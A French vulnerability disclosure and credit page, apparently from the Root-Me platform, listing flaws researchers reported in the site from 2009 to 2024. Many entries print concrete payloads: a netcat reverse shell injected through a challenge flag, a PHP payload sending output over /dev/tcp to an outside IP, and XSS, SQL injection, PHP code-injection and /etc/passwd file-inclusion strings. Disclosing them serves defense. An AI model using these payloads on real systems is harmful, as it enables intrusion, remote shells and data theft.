Faiblesses Découvertes
Comme n’importe quel système d’informations ce portail comporte des vulnérabilités...
26/08/2024 Mika
a identifié une vulnérabilité de type OS Command Injection permettant à un utilisateur d’obtenir un accès root sur les serveurs de challenges lors du déploiement d’un challenge avec un flag malveillant.
- RM{' && nc.traditional 51.75.X.X 4444 -e /bin/bash #}
07/02/2024 Nishacid
A identifié une vulnérabilité de type XSS stockée dans les traductions permettant à un membre de l’association de modifier n’importe quelle traduction du site par du code JavaScript à travers :
<img/src/onerror=confirm(document.domain)>
22/11/2023 Laluka
A identifié une faille de type stored XSS (file upload) to RCE via une injection de code sur la médiabox. Code php reflété (json_dump) puis évalué, le compte ciblé doit être webmestre.
const form = doc.querySelector('form[action="/ecrire/?exec=configurer_mediabox"]');
const formData = new FormData(form);
formData.append("lity[<?php echo system(base64_decode('aWQ='));?>]", 42);
14/07/2023 Elweth
A détecté une vulnérabilité dans la version du Chrome Headless que les bots utilisent pour les challenges Web-Client. La version en question était vulnérable à la CVE-2021-21224, ce qui pouvait conduire à une exécution de code dans l’environnement du bot.
27/08/2022 Laluka
A identifié une vulnérabilité ou le bump d’un contenu du site vers un statut plus élevé, (ex : draft à évaluation, ou poubelle à rédaction) déclenche l’envoi d’un email à l’auteur du challenge et/ou au webmestre. Certaines variables (titre, contenu, etc) ne sont pas encodés ou échappés correctement avant d’être passées à la fonction eval qui render l’email à envoyer. Une Blind-RCE était donc possible avec une payload comme <?php system("bash -c 'id > /dev/tcp/42.42.42.42/4242'"); ?>
dans le titre ou contenu de l’article.
21/07/2022 Abyss Watcher & SpawnZii
ont identifié une vulnérabilité de type RCE (remote code execution) permettant à un utilisateur privilégié d’exécuter du code PHP :
https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=TzoxOiJBIjoxOntzOjE6ImEiO3M6MzoiUG 9DIjt9'"><?php system('id;hostname;whoami');?>
17/03/2022 Abyss Watcher
a identifié une vulnérabilité de type XSS enregistrée permettant à un membre de l’association d’injecter du code Javascript à travers :
<iframe src="https://www.root-me.org/IMG/html/xss.html" hidden></iframe>
11/07/2022 Mizu
a identifié une vulnérabilité XSS stockée exploitable avec une iframe hébergée sur un domaine malveillant commençant par www.root-me.org :
<iframe src="https://www.root-me.org.evil.domain/">
23/11/2021 zLade
a identifié une vulnérabilité permettant à un membre de l’association d’élever son rôle vers celui administrateur simplement en utilisant l’interface privée de SPIP.
01/10/2021 Podalirius
a identifié une vulnérabilité de type faiblesse du contrôle d’accès permettant d’accéder aux documents joints aux solutions sans restrictions :
<imgXX>
15/05/2020 Laluka
a identifié plusieurs vulnérabilités : 3 XSS réfléchies, 2 SQLi et 1 RCE :
https://www.root-me.org/ecrire/?exec=plan&null=lalu%27%20onmouseover=alert(domain)%20style=%27width:9999999px;height:9999999px;%27%20foo=
https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=lalu%27https://www.root-me.org/%3E%3Ca%20href=err%20onfocus=alert(domain)%20autofocus/%3E
https://www.root-me.org/ecrire/?exec=admin_plugin&var_profile=pouet'/><script>alert(document.domain)</script>
https://www.root-me.org/ecrire/?exec=article_edit&lier_trad=1+AND+1%3D2%20union%20all%20select%201,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25;--
https://www.root-me.org/ecrire/?exec=accueil&where[]=(SELECT%20SLEEP(5)=1);--+-
https://www.root-me.org/ecrire/?exec=article&id_article=1&ajouter=non&tri_liste_aut=statut&deplacer=oui&_oups=%27%3C?php%20echo%20fread(popen(%22id%22,%20%22r%22),%20300);?%3E
12/01/2020 NonStandardModel
a identifié une vulnérabilité de type XSS sur le nom du fichier importé sur http://repository.root-me.org/
04/06/2019 warlock
a identifié une vulnérabilité de type XSS. Celle-ci nécessitait une intervention de l’utilisateur sur la chatbox (un clic sur page précédente).
http://www.root-me.org/data:%2F%2Ftext/html,<script>alert(1)<%2Fscript>
04/06/2019 warlock
a identifié une vulnérabilité permettant de tuer, avec un utilisateur non privilégié, la base de donnée disponible sur le serveur challenge01 qui héberge plusieurs challenges, en saturant la mémoire de façon particulière afin de tuer le processus de son choix. Cela a permis de relancer un autre binaire à la place en écoute sur le même port via une race condition.
16/11/2018 Hacqueen
a identifié une vulnérabilité permettant de piéger les utilisateurs de la boutique à travers une iframe via un domaine spreadshirt contrôlé par l’attaquant (ex : spreadshirt.ro), le paramètre lang n’était pas filtré correctement.
12/04/2018 DrStache & urandom
ont identifié une vulnérabilité de type stored XSS dans la carte d’OSM dans les salles de CTFATD en injectant la payload suivante dans la bio de l’utilisateur (https://www.root-me.org/?page=preferences&lang=fr)
<svg onload=console.log(document.domain)>
12/10/2015 ST4HLKR1EG
a identifié une vulnérabilité de type "référence indirecte à un objet non sécurisée" permettant de lire n’importe quel message privé :
page=messagerie&formulaire_action=messages_recus&formulaire_action_args=[valeur_random]&id_auteur=[id_auteur]&selection=sel&marquer_non_lus=marquer+comme+non+lu&selectionne[]=[ID_du_message]
03/2015 WtF
a identifié une vulnérabilité de type remote code execution (RCE) dans un challenge en cours d’évaluation sur le serveur de production lui permettant entre autre d’accéder au système de fichier avec SSH et d’exécuter des commandes.
03/2015 WtF
a identifié une vulnérabilité de type inclusion de fichiers arbitraire (LFI) dans le challenge web-serveur Path Truncation lui permettant entre autre de lire les fichiers d’autres challenges.
15/06/2013 LouTerrailloune
a identifié une vulnérabilité de type injection de code PHP sur la page "coder - décoder" :
Texte à décoder en base64 :
PD9waHAgcGhwaW5mbygpOyA/Pg==
06/11/2012 crown
a identifié plusieurs vulnérabilités de type stored XSS, notamment sur les champs "nom_site" et "url_site" mais également sur le champ "nom" utilisé pendant l’inscription :
<script>[code javascript/vbscript]</script>
20/03/2012 jimee
a identifié une vulnérabilité de type inclusion de fichiers arbitraire (LFI) dans un challenge lui permettant entre autre de lire les fichiers d’autres challenges :
http://www.root-me.org/challenge/hidden/hidden/page_..%252f..%252f..%252fch1%252fmesfonction.php
23/10/2011 courte66
a identifié une vulnérabilité de type reflected XSS sur la page "coder - décoder" :
Texte à décoder en base64 :
Jz4iPjxpbWcgc3JjPWxvbCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSkgLz4=
02/10/2011 Hypnoze
a identifié une vulnérabilité de type "référence indirecte à un objet non sécurisée" permettant de lire les messages privés de tous les membres :
http://www.root-me.org/spip.php?page=messagerie&id=write&repondre=[id_message_a_lire]
18/07/2011 g0uZ
a identifié une vulnérabilité de type injection de code PHP sur la page "outils en ligne : nmap", permettant entre autre d’exécuter des commandes système avec les privilèges de l’utilisateur exécutant le service HTTP.
Hôte à scanner en mode -sV :
--version-trace -p8888 [IP serveur maîtrisé]
Service en écoute sur le serveur maîtrisé :
i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done
30/06/2011 elyfean
a identifié une vulnérabilité de type CSRF sur la chatbox. Cela permettait entre autre de faire poster n’importe quoi à une personne authentifiée sur le portail visitant une page piégée avec ce code :
<form id="form" action="http//www.root-me.org/?lang=fr" method="post">
<input type=hidden name="ON" value="1">
<input type=hidden name="message" value="0wn3d !">
</form>
15/02/2011 EsSandre
a identifié une vulnérabilité de type inclusion de fichiers locaux (LFI) permettant de lire le contenu de n’importe quel fichier accessible en lecture au serveur web :
http://www.root-me.org/squelettes/script/protection_acces_http.php?file=../../../../../../../etc/passwd
02/02/2011 hello
a identifié plusieurs vulnérabilités de type stored XSS, notamment dans le corps d’un message privé et sur les champs "login" et "nom" du formulaire d’inscription :
<script>[code javascript/vbscript]</script>
02/12/2009 real
a identifié une injection de PHP sur la page poster.html. Cela permettait entre autre d’exécuter des commandes système avec les privilèges de l’utilisateur exécutant le service HTTP :
http://www.root-me.org/spip.php?page=poster&id_article=1'.system('pwd').'